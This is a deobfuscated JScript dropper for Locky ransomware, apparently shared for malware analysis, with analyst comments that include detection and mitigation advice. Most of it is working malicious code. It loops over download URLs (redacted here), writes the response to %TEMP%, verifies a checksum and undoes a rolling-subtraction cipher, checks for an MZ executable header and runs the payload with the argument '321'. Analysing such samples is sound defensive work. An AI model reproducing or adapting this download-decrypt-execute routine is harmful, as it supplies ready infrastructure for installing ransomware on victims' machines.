Locky dropper : file fully unobfuscated
<job><script language="JScript"> | |
// --- Analyst notes on the dropper's main loop (defender view) ---
// What this script visibly does: picks an HTTP COM object, cycles through the
// hard-coded URLs, writes each response to %TEMP%, pushes it through the
// CP437 round-trip + checksum + rolling-subtraction decoder defined below,
// sanity-checks size and the 'MZ' header, rewrites the file and executes it.
// Detection / mitigation hooks: wscript.exe or cscript.exe instantiating
// WinHttpRequest / MSXML2.XMLHTTP and ADODB.Stream and then spawning an .exe
// from %TEMP% with the argument "321"; blocking Windows Script Host for
// attachment-launched .wsf/.js files stops it before any download happens.

// Drop location: %TEMP%/E8ANs5ZfEe.exe (the file name is fixed in this sample).
var payload_path = WScript["CreateObject"]("WScript.Shell").ExpandEnvironmentStrings("%TEMP%/")+"E8ANs5ZfEe.exe";
// URLs have been, obviously, changed
var urls = ["http://XXXXXXXXXXXXXXXXXXX", "http://XXXXXXXXXXXXXXXXXXXXXXX", "http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"];
// Candidate HTTP COM progids; the first one that instantiates wins.
// "WinHttpRequest.(31143109).1" looks like a mangled WinHTTP progid (unverified);
// MSXML2.XMLHTTP is the fallback.
var http_methods = ["WinHttpRequest.(31143109).1", "MSXML2.XMLHTTP"];
for(var i=0;i<http_methods["length"];i++){
try{
var download_payload = WScript["CreateObject"](http_methods[i]);
break;
}catch(e){
continue;
}
};
// NOTE: if neither progid instantiates, download_payload stays undefined and
// every iteration below throws into the outer catch, sleeping 1 s forever.
var continuer = 1;
var j = 0;
// continuer is only ever assigned 1, so `1 == continuer` is always true and
// the loop is left only through the break after a failed save.
while(continuer){
try{
if(1 == continuer){
// After a full pass over the URL list, wait 1 s and start over.
if(j >= urls["length"]){
j = 0;
WScript["Sleep"](1000);
}
// Synchronous GET (third argument false) to the next URL in rotation.
download_payload["open"]("GET", urls[j++ % urls["length"]], false);
download_payload["send"]();
}
// Poll until the request reports complete (4); with a synchronous open
// this is normally already the case.
if(download_payload.readystate < 4){
WScript["Sleep"](100);
continue;
}
// Write the raw response body to disk: type 1 = adTypeBinary,
// SaveToFile mode 2 = adSaveCreateOverWrite.
var payload_file = WScript["CreateObject"]("ADODB.Stream");
payload_file["open"]();
payload_file["type"] = 1;
payload_file["write"](download_payload["ResponseBody"]);
payload_file["position"] = 0;
payload_file["SaveToFile"](payload_path, 2);
payload_file["close"]();
// Read the file back as CP437 text -> byte array, then verify the trailing
// checksum and undo the rolling-subtraction transform.
var payload_content = read_payload(payload_path);
payload_content = decrypt_payload(payload_content);
// Accept only decrypted blobs between 100 KiB (102400) and 230 KiB (235520)
// that start with the 'MZ' executable header; anything else (including the
// [] returned on a checksum mismatch) restarts the download loop.
if(payload_content["length"] < 102400 || payload_content["length"] > 235520 || !check_header(payload_content)){
continuer = 1;
continue;
}
// Overwrite the downloaded file with the decrypted bytes; a failure here is
// the only path that leaves the loop.
try{
save_decrypted_payload(payload_path, payload_content);
}catch(e){
break;
};
// Execute the dropped file with the command-line argument "321". Nothing
// after this leaves the loop, so the script goes round again.
WScript["CreateObject"]("WScript.Shell")["Run"](payload_path+" 321");
}catch(e){
// Any error (network, COM, undefined download object): wait 1 s and retry.
WScript["Sleep"](1000);
continue;
}
}
// LYUo | |
// Read the file at `arg` back as text in code page 437 (ADODB.Stream
// type 2 = adTypeText, Charset "437") and convert every character back to
// a byte value with decode(). This is how the sample round-trips the
// downloaded binary through CP437 text.
// Returns: array of byte values (undefined for characters outside the table).
function read_payload(arg){
var Vt = WScript["CreateObject"]("ADODB.Stream");
// Type and Charset are set before open(); keep that order.
Vt["type"]=2;
Vt["Charset"] = "437";
Vt["open"]();
Vt["LoadFromFile"](arg);
var k = Vt["ReadText"];
Vt["close"]();
return decode(k);
}
// NDn2 | |
// Map a CP437-decoded string back to raw byte values.
// Inverse of encode(): characters that came from bytes 0x80..0xFF are looked
// up in the inverted CP437 table; ASCII (< 128) passes through unchanged.
// Characters not in the table yield undefined, exactly like the original
// sparse lookup.
//
// arg: string as read from the file in code page 437.
// Returns: array of numbers (byte values), one per input character.
function decode(arg){
  // CP437 upper half, listed in byte order 0x80 .. 0xFF.
  var CP437_HIGH = [
    0x00C7, 0x00FC, 0x00E9, 0x00E2, 0x00E4, 0x00E0, 0x00E5, 0x00E7, 0x00EA, 0x00EB, 0x00E8, 0x00EF, 0x00EE, 0x00EC, 0x00C4, 0x00C5,
    0x00C9, 0x00E6, 0x00C6, 0x00F4, 0x00F6, 0x00F2, 0x00FB, 0x00F9, 0x00FF, 0x00D6, 0x00DC, 0x00A2, 0x00A3, 0x00A5, 0x20A7, 0x0192,
    0x00E1, 0x00ED, 0x00F3, 0x00FA, 0x00F1, 0x00D1, 0x00AA, 0x00BA, 0x00BF, 0x2310, 0x00AC, 0x00BD, 0x00BC, 0x00A1, 0x00AB, 0x00BB,
    0x2591, 0x2592, 0x2593, 0x2502, 0x2524, 0x2561, 0x2562, 0x2556, 0x2555, 0x2563, 0x2551, 0x2557, 0x255D, 0x255C, 0x255B, 0x2510,
    0x2514, 0x2534, 0x252C, 0x251C, 0x2500, 0x253C, 0x255E, 0x255F, 0x255A, 0x2554, 0x2569, 0x2566, 0x2560, 0x2550, 0x256C, 0x2567,
    0x2568, 0x2564, 0x2565, 0x2559, 0x2558, 0x2552, 0x2553, 0x256B, 0x256A, 0x2518, 0x250C, 0x2588, 0x2584, 0x258C, 0x2590, 0x2580,
    0x03B1, 0x00DF, 0x0393, 0x03C0, 0x03A3, 0x03C3, 0x00B5, 0x03C4, 0x03A6, 0x0398, 0x03A9, 0x03B4, 0x221E, 0x03C6, 0x03B5, 0x2229,
    0x2261, 0x00B1, 0x2265, 0x2264, 0x2320, 0x2321, 0x00F7, 0x2248, 0x00B0, 0x2219, 0x00B7, 0x221A, 0x207F, 0x00B2, 0x25A0, 0x00A0
  ];
  // Invert the table: code point -> byte value.
  var byteForChar = [];
  for (var b = 0; b < CP437_HIGH.length; b++) {
    byteForChar[CP437_HIGH[b]] = 0x80 + b;
  }
  var out = [];
  var count = arg.length;
  for (var pos = 0; pos < count; pos++) {
    var code = arg.charCodeAt(pos);
    out.push(code < 128 ? code : byteForChar[code]);
  }
  return out;
}
// DTx | |
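// Verify the trailing 32-bit checksum of a decoded byte array and, if it
// matches, undo the rolling-subtraction transform the payload was stored with.
//
// arg: array of byte values (0..255) as produced by decode(). As in the
//      original it is modified in place: the 4 checksum bytes are spliced
//      off and the array is reversed.
// Returns: the decrypted byte array (the same array object), or [] when the
//      checksum does not match or the input is too short to hold one.
function decrypt_payload(arg){
  // Fewer than 4 bytes cannot carry the trailer; the original arithmetic can
  // never match in that case either, so answer [] up front.
  if (arg.length < 4) {
    return [];
  }
  var len = arg.length;
  // Stored checksum: little-endian 32-bit value in the last four bytes.
  // `<< 24` yields a signed 32-bit result while the sum below stays
  // non-negative; that is the sample's own behaviour and is kept as is.
  var stored = arg[len - 4] | arg[len - 3] << 8 | arg[len - 2] << 16 | arg[len - 1] << 24;
  arg.splice(len - 4, 4);
  // Computed checksum: 40 plus the sum of all remaining bytes, mod 2^32.
  var computed = 40;
  for (var i = 0; i < arg.length; i++) {
    computed = (computed + arg[i]) % 0x100000000;
  }
  if (computed !== stored) {
    return [];
  }
  // Decrypt: reverse the buffer, then subtract a key that starts at 30 and
  // advances by 55 (mod 256) per byte. `key` was an implicit global in the
  // original (`v3 = 30` with no declaration); it is a local here.
  var key = 30;
  arg.reverse();
  for (var pos = 0; pos < arg.length; pos++) {
    var plain = arg[pos] - key;
    if (plain < 0) {
      plain += 0x100;
    }
    arg[pos] = plain;
    key = (key + 55) % 256;
  }
  return arg;
}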
// Xu9 | |
// Report whether the byte array starts with 'M' (0x4D) 'Z' (0x5A), the
// DOS/PE executable header marker.
// arg: array of byte values.
// Returns: true when the first two bytes are 0x4D, 0x5A; false otherwise
//          (including for arrays shorter than two elements).
function check_header(arg){
  var hasMz = arg[0] == 0x4D && arg[1] == 0x5A;
  return hasMz;
}
// QMg4 | |
// Turn an array of byte values into the CP437 text string that represents
// them: bytes below 128 map to themselves, bytes 0x80..0xFF map to the CP437
// upper-half code points. Inverse of decode().
//
// arg: array of byte values (0..255).
// Returns: string with one character per input element. Values outside the
//          table (e.g. >= 256) become "\u0000", as String.fromCharCode(undefined)
//          did in the original.
function encode(arg){
  // CP437 upper half, listed in byte order 0x80 .. 0xFF.
  var CP437_HIGH = [
    0x00C7, 0x00FC, 0x00E9, 0x00E2, 0x00E4, 0x00E0, 0x00E5, 0x00E7, 0x00EA, 0x00EB, 0x00E8, 0x00EF, 0x00EE, 0x00EC, 0x00C4, 0x00C5,
    0x00C9, 0x00E6, 0x00C6, 0x00F4, 0x00F6, 0x00F2, 0x00FB, 0x00F9, 0x00FF, 0x00D6, 0x00DC, 0x00A2, 0x00A3, 0x00A5, 0x20A7, 0x0192,
    0x00E1, 0x00ED, 0x00F3, 0x00FA, 0x00F1, 0x00D1, 0x00AA, 0x00BA, 0x00BF, 0x2310, 0x00AC, 0x00BD, 0x00BC, 0x00A1, 0x00AB, 0x00BB,
    0x2591, 0x2592, 0x2593, 0x2502, 0x2524, 0x2561, 0x2562, 0x2556, 0x2555, 0x2563, 0x2551, 0x2557, 0x255D, 0x255C, 0x255B, 0x2510,
    0x2514, 0x2534, 0x252C, 0x251C, 0x2500, 0x253C, 0x255E, 0x255F, 0x255A, 0x2554, 0x2569, 0x2566, 0x2560, 0x2550, 0x256C, 0x2567,
    0x2568, 0x2564, 0x2565, 0x2559, 0x2558, 0x2552, 0x2553, 0x256B, 0x256A, 0x2518, 0x250C, 0x2588, 0x2584, 0x258C, 0x2590, 0x2580,
    0x03B1, 0x00DF, 0x0393, 0x03C0, 0x03A3, 0x03C3, 0x00B5, 0x03C4, 0x03A6, 0x0398, 0x03A9, 0x03B4, 0x221E, 0x03C6, 0x03B5, 0x2229,
    0x2261, 0x00B1, 0x2265, 0x2264, 0x2320, 0x2321, 0x00F7, 0x2248, 0x00B0, 0x2219, 0x00B7, 0x221A, 0x207F, 0x00B2, 0x25A0, 0x00A0
  ];
  var chars = [];
  for (var pos = 0; pos < arg.length; pos++) {
    var value = arg[pos];
    // ASCII passes through; anything else is indexed relative to 0x80.
    var code = value < 128 ? value : CP437_HIGH[value - 0x80];
    chars.push(String.fromCharCode(code));
  }
  return chars.join("");
}
// LTs7 | |
// Overwrite the file at `payload_path` with the decrypted bytes: the byte
// array is turned back into CP437 text by encode() and written through an
// ADODB.Stream in text mode (type 2) with Charset "437", so the bytes land
// on disk unchanged. SaveToFile mode 2 = adSaveCreateOverWrite.
// payload_path: destination path (the same %TEMP% file the loop downloaded to).
// payload_content: array of byte values as returned by decrypt_payload().
function save_decrypted_payload(payload_path, payload_content){
var Vt = WScript["CreateObject"]("ADODB.Stream");
// Type and Charset are set before open(); keep that order.
Vt["type"] = 2;
Vt["Charset"] = "437";
Vt["open"]();
Vt["writeText"](encode(payload_content));
Vt["SaveToFile"](payload_path, 2);
Vt["close"]();
};
</script></job> |